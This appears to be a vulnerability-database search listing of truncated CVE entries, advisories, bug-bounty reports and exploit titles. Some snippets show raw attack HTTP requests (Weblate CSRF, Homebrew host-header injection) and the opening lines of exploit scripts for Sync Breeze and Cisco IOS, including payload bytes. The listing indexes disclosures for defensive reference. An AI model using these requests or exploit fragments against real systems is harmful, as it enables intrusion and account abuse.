1472 matches found
CVE-2016-9526
CVE-2016-9526 is rejected/not used per the Initial Description.
CVE-2016-9656
CVE-2016-9656 is rejected/not used and does not represent an active vulnerability entry.
CVE-2016-9688
The CVE-2016-9688 entry is rejected/not used per the Initial Description.
Windows COM Elevation of Privilege Vulnerability
An elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges. To exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability...
Dashlane: Extract Billing admin email address using random team id
Any user can extract and enumerate email addresses of Dashlane members. Steps to reproduce: 1. Log in to console.dashlane.com. Register using https://www.dashlane.com/business/try 2. Click on Manage Users while intercepting the request in Burp 3. Look for a request to...
Request KeyChain Access
github.com/docker/docker-credential-helpers requests keychain access for random keys. This is when the credential helper doesn't have a login keychain specified. It then tries to look at every registered keychain...
Exploit for OS Command Injection in Pfsense
Developed Exploits This repository will contain any exploit o...
Weblate: CSRF : Lock and Unlock Translation
Description: An attacker can force a victim to lock and unlock a translation. The HTTP request: GET /lock/aptoide-uploader/strings/ka/ HTTP/1.1 Host: hosted.weblate.org Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10123 AppleWebKit/537.36 KHTML,...
Weblate: CSRF : Reset API
Description: An attacker can force a victim to reset his API. The HTTP request: GET /accounts/reset-api-key/ HTTP/1.1 Host: hosted.weblate.org Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10123 AppleWebKit/537.36 KHTML, like Gecko...
Scientific Linux Security Update : bind on SL7.x x86_64 (20170419)
Security Fixes : - A denial of service flaw was found in the way BIND handled a query response containing CNAME or DNAME resource records in an unusual order. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response...
Homebrew: Host header Injection
HI SECURITY TEAM Here is host header injection. Request changing host to www.google.com GET / HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 Windows NT 6.1; rv:24.0 Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...
Authentication flaw
The TMM SSO plugin in F5 BIG-IP APM 12.0.0 - 12.1.1, 11.6.0 - 11.6.1 HF1, 11.5.4 - 11.5.4 HF2, when configured as a SAML Identity Provider with a Service Provider (SP) connector, might allow traffic to be disrupted or failover initiated when a malformed, signed SAML authentication request from an...
Exploit for Improper Input Validation in Cisco Ios
CVE-2017-3881 Cisco IOS remote code execution ==================...
Sync Breeze Enterprise 9.5.16 - GET Buffer Overflow (SEH) Exploit
Exploit for windows platform in category remote exploits !/usr/bin/env python Exploit Title: Sync Breeze Enterprise v9.5.16 - Remote buffer overflow SEH Date: 2017-03-29 Exploit Author: Daniel Teixeira Vendor Homepage: http://syncbreeze.com Software Link:...
Denial Of Service (DoS)
keycloak-saml-core is vulnerable to denial of service (DoS) attacks. The vulnerability exists due to the mishandling of a Logout request with an Extensions in the middle of the request...
XXE
XML External Entity (XXE) vulnerability in PySAML2 4.4.0 and earlier allows remote attackers to read arbitrary files via a crafted SAML XML request or response...
EON 5.0 SQL Injection
CVE-2017-6088 EON 5.0 Multiple SQL Injection Description EyesOfNetwork "EON" is an OpenSource network monitoring solution. SQL injection authenticated The Eonweb code does not correctly filter arguments, allowing authenticated users to inject arbitrary SQL requests. CVE ID: CVE-2017-6088 Access...
PloitKit - The Hacker's ToolBox
PloitKit is a Python-based GUI tool designed as a one-stop for all other software. I was facing these kinds of problems when I needed to switch to a different system, or I lost my pen drive. I had to go to Google, and search for every tool and download every tool and so on. So I decided to create a tool,...
Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory
!/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6...
Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory
!/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6 payload = '5\xc7\x07\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02' payload +=...